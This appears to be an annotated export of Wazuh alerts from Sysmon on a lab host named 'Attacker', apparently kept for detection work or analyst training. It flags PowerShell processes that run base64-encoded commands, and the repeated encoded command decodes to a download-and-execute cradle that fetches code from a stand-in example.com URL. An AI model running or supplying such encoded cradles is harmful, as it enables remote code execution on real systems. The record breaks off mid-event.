data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:13.634 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1120995 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:15.7536912Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282677 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:14.714
ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ProcessId: 11988
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00}
ParentProcessId: 8684
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:14.714 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8684 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1129062 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:15.9842219Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282678 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:15.968
ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ProcessId: 11988
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_blnnlgfs.rwq.ps1
CreationUtcTime: 2025-04-24 22:36:15.968
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:15.968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_blnnlgfs.rwq.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:15.968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1131831 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:19.7512986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282717 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:17.032
ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ProcessId: 12012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00}
ParentProcessId: 11988
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:17.032 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534221.1139902 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:19.9724799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282718 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:19.900
ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ProcessId: 12012
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_igv42wmh.ctb.ps1
CreationUtcTime: 2025-04-24 22:36:19.900
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:19.900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_igv42wmh.ctb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:19.900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1142671 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:22.1640650Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282752 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:21.060
ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ProcessId: 10556
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
